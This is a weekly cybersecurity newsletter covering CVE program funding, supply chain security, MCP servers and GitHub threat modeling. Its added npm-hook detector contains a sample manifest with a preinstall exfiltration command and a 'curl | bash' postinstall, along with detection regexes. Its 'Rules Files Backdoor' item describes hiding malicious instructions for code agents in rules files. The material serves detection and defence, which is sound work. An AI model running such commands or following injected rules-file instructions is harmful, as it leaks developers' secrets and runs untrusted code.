CramHacks Chronicles #79: Weekly Cybersecurity Newsletter!
CVE Program Funding Extended, MCP Server Security, Weaponizing Code Agents, Threat Modeling GitHub, Anatomy of Malicious Open Source Packages
Hello, and Happy Monday!
I’m looking forward to speaking at OWASP San Diego tomorrow and making more people feel like we’re all doomed thanks to supply chain security 🫠.
In all seriousness, someone recently pointed out to me how far the industry has come in just the last few years. They were totally right; I’m trying to be less pessimistic about the current state of things. But to be fair, the current state is still pretty freak’n terrible.
Special thank you to OX Security for sponsoring this week’s newsletter! Fun fact, I own a neuroscience textbook. But I’ve read maybe 20 pages . . . one day 😀.

Can too many alerts harm your well-being?
Join neuroscientist Moshe Bar and security expert Matt Johansen (Vulnerable U) to uncover the science of alert fatigue—and how to beat it.
Unless you live under a rock, you probably heard that MITRE was only hours away from losing funding and would no longer be supporting the CVE Program. Since then, CISA has announced that funding for MITRE's contract has been extended 🎉.
This was a rollercoaster. I particularly enjoyed how those who regularly bash on the CVE Program were suddenly mad that it might no longer exist. 🤔
Has this stirred the pot and caused redundancy plans and/or privatized vulnerability databases to be more desirable? I guess we’ll find out! That said, the European Union Agency for Cybersecurity (ENISA) did just launch the European vulnerability database (EUVD). The site is currently in beta.
Fifty Years of Open Source Software Supply Chain Security
Russ Cox, former Tech Lead of the Go programming language team (a position he held for more than a decade 🤯), discusses the evolution of software supply chain security and how we’ve gotten to today. Topics covered include Authenticating Software, Making Builds Reproducible, Finding and Fixing Vulnerabilities, and Funding Open Source.
👋 After reading this, I came across a recording of a talk Russ gave at ACM SCORED: Open Source Supply Chain Security at Google, in 2023. Also a fantastic resource and would make for a great lecture (IMO). I’m looking forward to the day they begin to teach supply chain security in university.
Australian Signals Directorate: Guidelines for cryptography
“Note, for interoperability and maintainability reasons, HMAC-SHA256 will not be approved beyond 2030.”
👋 Can we talk about how cyber.gov.au pages have a complexity score, and this is somehow ‘moderate’? What the heck would be hard? 😆
Anatomy of Malicious Open Source Packages
SafeDep analyzed a random sample of the DataDog Malicious Packages Dataset using its LLM-powered static analysis engine to reveal common TTPs: 78% abused npm install hooks, 65% exfiltrated system information, and 52% used code obfuscation. More stats in the full post.
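As an added example (not SafeDep’s engine or anything from their post), here is a small Node check that flags npm lifecycle hooks whose commands carry indicators of the TTPs listed above: install hooks, system-info exfiltration, and obfuscation. The hook list, the indicator regexes, and the sample manifest are my own assumptions.

```javascript
// Added example (not SafeDep's analysis engine): a small static check that
// flags npm lifecycle hooks whose commands carry indicators of the TTPs
// summarized above. Hook list and indicator patterns are assumptions.
const HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Each indicator maps a regex to the TTP it hints at; crude by design.
const INDICATORS = [
  { re: /\bcurl\b|\bwget\b|https?:\/\//i, ttp: "network fetch (dropper/exfil channel)" },
  { re: /\|\s*(sh|bash)\b/, ttp: "pipe to shell" },
  { re: /\bnode\s+-e\b/, ttp: "inline node execution" },
  { re: /base64|\\x[0-9a-f]{2}|\beval\(/i, ttp: "encoding/obfuscation" },
  { re: /\$\w+|process\.env|\bos\.(hostname|userInfo)\b/, ttp: "environment/system info read" },
];

// Returns one finding per (hook, indicator) match so a reviewer sees which
// hook runs and why it was flagged. Non-hook scripts (test, build) are ignored.
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    for (const { re, ttp } of INDICATORS) {
      if (re.test(cmd)) findings.push({ hook, ttp, cmd });
    }
  }
  return findings;
}

// Constructed sample manifest (not a real package); example.invalid is a
// reserved TLD and never resolves.
const SAMPLE_MANIFEST = {
  name: "constructed-sample-pkg",
  version: "1.0.0",
  scripts: {
    preinstall: "node -e \"require('http').get('http://example.invalid/?h=' + process.env.HOME)\"",
    postinstall: "curl -s https://example.invalid/setup.sh | bash",
    test: "node test.js",
  },
};

for (const f of auditLifecycleScripts(SAMPLE_MANIFEST)) console.log(`${f.hook}: ${f.ttp}`);
```

Pointing this at the package.json of each dependency in node_modules gives a quick triage list; real engines (SafeDep’s included) go further by analyzing the code the hook actually invokes.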
“Rules Files Backdoor”: How Hackers Can Weaponize Code Agents
Pillar Security’s Ziv Karliner highlights how Cursor’s Rules file and Copilot’s instructions file can be weaponized by injecting malicious instructions. Both file types also support hidden Unicode characters, making the injected instructions invisible to developers. They’ve also provided a tool to scan rule files for backdoors.
👋 I honestly didn’t even know about these instruction files. What happens if an open source project adds one of these to their project, with malicious instructions (e.g., sends env variables to a controlled endpoint)? 🤔
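To make the “hidden Unicode” part concrete, here is an added example (my own code, not Pillar Security’s scanner) that walks a rules file by code point, reports invisible and direction-changing characters with their line numbers, and decodes Unicode tag characters back to the ASCII they mirror so a reviewer can read what was concealed. The character ranges and the sample file are assumptions covering common cases, not an exhaustive list.

```javascript
// Added example (not Pillar Security's scanner): report invisible or
// direction-changing Unicode in an agent rules file, where it could hide
// injected instructions from a reviewer. The ranges below are an assumption
// covering common cases, not an exhaustive list.
const HIDDEN_RANGES = [
  [0x00ad, 0x00ad, "soft hyphen"],
  [0x200b, 0x200f, "zero-width space/joiner or bidi mark"],
  [0x202a, 0x202e, "bidi embedding/override"],
  [0x2060, 0x2064, "word joiner / invisible operator"],
  [0x2066, 0x2069, "bidi isolate"],
  [0xfeff, 0xfeff, "zero-width no-break space"],
  [0xe0000, 0xe007f, "Unicode tag character"],
];

function classify(cp) {
  for (const [lo, hi, label] of HIDDEN_RANGES) {
    if (cp >= lo && cp <= hi) return label;
  }
  return null;
}

// Walk by code point (not UTF-16 unit, so tag characters above the BMP are
// seen whole), report each hidden character with its line, decode tag
// characters to the ASCII they mirror, and return a cleaned copy for review.
function scanRulesFile(text) {
  const findings = [];
  let line = 1;
  for (const ch of text) {
    if (ch === "\n") { line++; continue; }
    const cp = ch.codePointAt(0);
    const label = classify(cp);
    if (label === null) continue;
    const finding = { line, codePoint: "U+" + cp.toString(16).toUpperCase().padStart(4, "0"), label };
    if (cp >= 0xe0020 && cp <= 0xe007e) finding.hidden = String.fromCodePoint(cp - 0xe0000);
    findings.push(finding);
  }
  const cleaned = Array.from(text).filter((c) => classify(c.codePointAt(0)) === null).join("");
  return { findings, cleaned };
}

// Constructed sample rules file: two zero-width spaces plus tag characters
// that spell "abc" (U+E0061..U+E0063), all invisible in most editors.
const SAMPLE_RULES =
  "Always write tests for new functions.\n" +
  "Prefer named\u200Bexports.\u{E0061}\u{E0062}\u{E0063}\n" +
  "Keep functions under 40 lines.\u200B\n";
for (const f of scanRulesFile(SAMPLE_RULES).findings) {
  console.log(`line ${f.line}: ${f.codePoint} ${f.label}${f.hidden ? " -> " + f.hidden : ""}`);
}
```

Running this as a pre-commit or CI check over files like .cursorrules and .github/copilot-instructions.md turns the invisible into a diff a human can actually review.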
Understanding and Preventing Open-Source Software Supply Chain Attacks
Piergiorgio Ladisa recently shared his doctoral thesis; it focuses on solidifying the basics of malware campaigns targeting open source software packages, but the depth and historical context are incredible.
👋 I’m always in awe when people can turn something fairly sophisticated and difficult to talk about, into something as simple as a tree-representation. Here’s Piergiorgio doing exactly that: Risk Explorer for Software Supply Chains
Can Lessons from Software Supply Chain Security Be Applied to MCP?
Jose Miguel Parrella considers how supply chain technologies such as trusted publishers, provenance attestations, sandboxing, and enterprise policy hooks can be applied to MCP Servers.
👋 It’s time for me to go down the AI rabbit hole. From a supply chain perspective, I’m not eager to learn more about things like model poisoning. But MCP and Google’s Agent2Agent protocol are very clearly supply chain risks, and therefore . . . I must learn. MCP is giving big “security vs convenience” vibes. The current security concerns are very much real, but the convenience is there, and therefore adoption 📈.
Threat Modeling GitHub - How vulnerable-by-design Github is?
Srajan Gupta discusses existing risks within the GitHub platform, many of which have been long discussed but accepted as design trade-offs. Topics covered include: Supply Chain Attacks, Access Control Design, GitHub Actions & CI/CD Security, Secrets Management, Repository Security Design, and SHA-1 Collision attacks.
Until Next Time! 👋
Hey, you made it to the bottom – thanks for sticking around!
Questions, ideas, or want to chat? Slide into my inbox! 💌
Don’t hesitate to forward if someone could benefit from this.
See you next Monday!
-Kyle
P.S. CramHacks has a Supporter tier! You can upgrade here to support CramHacks and its free weekly content 😃.